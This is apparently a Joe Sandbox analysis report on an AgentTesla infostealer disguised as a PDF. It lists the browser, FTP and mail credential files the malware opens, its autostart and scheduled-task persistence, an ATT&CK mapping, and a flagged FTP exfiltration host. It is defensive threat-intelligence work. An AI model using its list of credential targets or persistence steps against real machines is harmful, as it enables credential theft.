                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    [Behavior graph: ID 1518233, Sample: z38PO_20248099-1_pdf.exe, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    z38PO_20248099-1_pdf.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla |
                    z38PO_20248099-1_pdf.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla |
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla |

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    https://api.ipify.org/ | 0% | URL Reputation | safe |
                    https://api.ipify.org | 0% | URL Reputation | safe |
                    https://account.dyn.com/ | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    http://ftp.haliza.com.my | 0% | Avira URL Cloud | safe |
                    https://api.ipify.org/t | 0% | Avira URL Cloud | safe |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ipify.org | 172.67.74.152 | true | false | | unknown
                    ftp.haliza.com.my | 110.4.45.197 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org/ | false | URL Reputation: safe | unknown
                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                        110.4.45.197 | ftp.haliza.com.my | Malaysia | | 46015 | EXABYTES-AS-APExaBytesNetworkSdnBhdMY | true
                        172.67.74.152 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1518233
                        Start date and time:2024-09-25 14:41:23 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:28
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:z38PO_20248099-1_pdf.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 482
                        • Number of non-executed functions: 5
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: z38PO_20248099-1_pdf.exe
                        Time | Type | Description
                        08:42:19 | API Interceptor | 5893430x Sleep call for process: z38PO_20248099-1_pdf.exe modified
                        08:42:20 | API Interceptor | 41x Sleep call for process: powershell.exe modified
                        08:42:25 | API Interceptor | 1288139x Sleep call for process: FrFvspxoHsPs.exe modified
                        08:42:32 | API Interceptor | 4739059x Sleep call for process: sgxIb.exe modified
                        13:42:21 | Task Scheduler | Run new task: FrFvspxoHsPs path: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                        13:42:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                        13:42:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        110.4.45.197z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                          rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                            PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              172.67.74.152file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
                              • api.ipify.org/
                              FormPlayer.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ftp.haliza.com.myz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              api.ipify.orgz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 172.67.74.152
                              Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 104.26.13.205
                              rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.13.205
                              Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                              • 104.26.12.205
                              reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                              • 104.26.13.205
                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                              • 104.26.12.205
                              http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                              • 104.26.13.205
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              EXABYTES-AS-APExaBytesNetworkSdnBhdMYz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                              • 103.6.198.219
                              PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 103.6.198.178
                              purchase order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 103.6.198.178
                              rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                              • 43.252.214.42
                              https://berobv.nl/Get hashmaliciousUnknownBrowse
                              • 103.6.198.176
                              CLOUDFLARENETUS0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                              • 188.114.97.3
                              rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                              • 188.114.96.3
                              http://hye.com.mxGet hashmaliciousUnknownBrowse
                              • 104.18.10.207
                              https://EIB.m365-microsoft.com/i/d62c9121ed3e64f32bfe6dd51720150ce?fp=a8b756deca&twc=000066140762&e=afdbb4a2cfc14765bdcddb3a4ff152c6Get hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                              • 188.114.97.3
                              t1RVQb98yT.exeGet hashmaliciousS400 RATBrowse
                              • 162.159.135.232
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              3b5074b1b5d032e5620f69f9f700ff0erTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.74.152
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.74.152
                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              http://hye.com.mxGet hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              batman.ps1Get hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              No context
                              Process:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
